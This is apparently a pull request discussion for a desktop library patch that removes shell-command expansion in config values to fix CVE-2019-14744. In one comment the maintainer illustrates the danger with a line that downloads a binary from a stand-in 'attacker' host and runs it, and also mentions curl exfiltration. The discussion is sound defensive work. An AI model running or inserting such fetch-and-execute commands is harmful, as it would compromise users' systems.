Security: remove support for $(...) in config keys with [$e] marker. #46

Συγχωνεύτηκαν χειροκίνητα
SlavekB συγχώνευσε 1 υποβολές από issue/45/CVE-2019-14744 σε master 5 έτη πριν
SlavekB σχολίασε 5 έτη πριν
Ιδιοκτήτης

Patch is based on KDE Frameworks 5 kconfig patch for CVE-2019-14744.

Patch is based on KDE Frameworks 5 kconfig patch for CVE-2019-14744.
SlavekB το πρόσθεσε στο R14.0.7 release ορόσημο 5 έτη πριν
SlavekB πρόσθεσε τη σήμανση SL/critical 5 έτη πριν
SlavekB πρόσθεσε μια νέα εξάρτηση 5 έτη πριν
MicheleC σχολίασε 5 έτη πριν
Ιδιοκτήτης

Looks good to me

Looks good to me
sunjob σχολίασε 5 έτη πριν

The problem is not the availability of this functionality, but that it should be allowed only for trusted paths:

/usr/...
/usr/local/...
/etc/...
$XDG_CONFIG_HOME
etc

And instead of implementing it as it should, you just deleted this functionality now. Wow...

The problem is not the availability of this functionality, but that it should be allowed only for trusted paths: /usr/... /usr/local/... /etc/... $XDG_CONFIG_HOME etc And instead of implementing it as it should, you just deleted this functionality now. Wow...
SlavekB σχολίασε 5 έτη πριν
Συντάκτης
Ιδιοκτήτης

The problem is that simply reading a value causes some script to execute. Therefore, it is not a question of limiting to trusted paths. For example, there could be run regular /usr/bin/wget https://attacker/binary && chmod a+x binary && ./binary; echo "Have a nice day.". Or curl with sending information to a remote server,… Therefore removing it seems like a good idea. After all, we used the same solution as in the KDE world.

The problem is that simply reading a value causes some script to execute. Therefore, it is not a question of limiting to trusted paths. For example, there could be run *regular* `/usr/bin/wget https://attacker/binary && chmod a+x binary && ./binary; echo "Have a nice day."`. Or curl with sending information to a remote server,… Therefore removing it seems like a good idea. After all, we used the same solution as in the KDE world.
MicheleC σχολίασε 5 έτη πριν
Ιδιοκτήτης

I agree with Slavek's comment. It is basically impossible to make this feature safe in all cases if we keep it enabled. The simple example in Slavek's comment is quite emblematic.

Removal seems the only sensible way to go.

I agree with Slavek's comment. It is basically impossible to make this feature safe in all cases if we keep it enabled. The simple example in Slavek's comment is quite emblematic. Removal seems the only sensible way to go.
sunjob σχολίασε 5 έτη πριν

although maybe it’s better than having such a big hole :о)

although maybe it’s better than having such a big hole :о)
SlavekB έκλεισε αυτό το pull request 5 έτη πριν
SlavekB έκλεισε αυτό το pull request 5 έτη πριν
SlavekB διέγραψε το κλάδο issue/45/CVE-2019-14744 5 έτη πριν
Το pull request έχει συγχωνευθεί χειροκίνητα ως 1074eb0336.
Συνδεθείτε για να συμμετάσχετε σε αυτή τη συνομιλία.
Δεν υπάρχουν εξεταστές
Χωρίς Ορόσημο
Χωρίς Αποδέκτη
3 Συμμετέχοντες
Ειδοποιήσεις
Ημερομηνία Παράδοσης

Δεν ορίστηκε ημερομηνία παράδοσης.

Μπλοκάρει
Αναφορά: TDE/tdelibs#46
Φόρτωση…
Δεν υπάρχει ακόμα περιεχόμενο.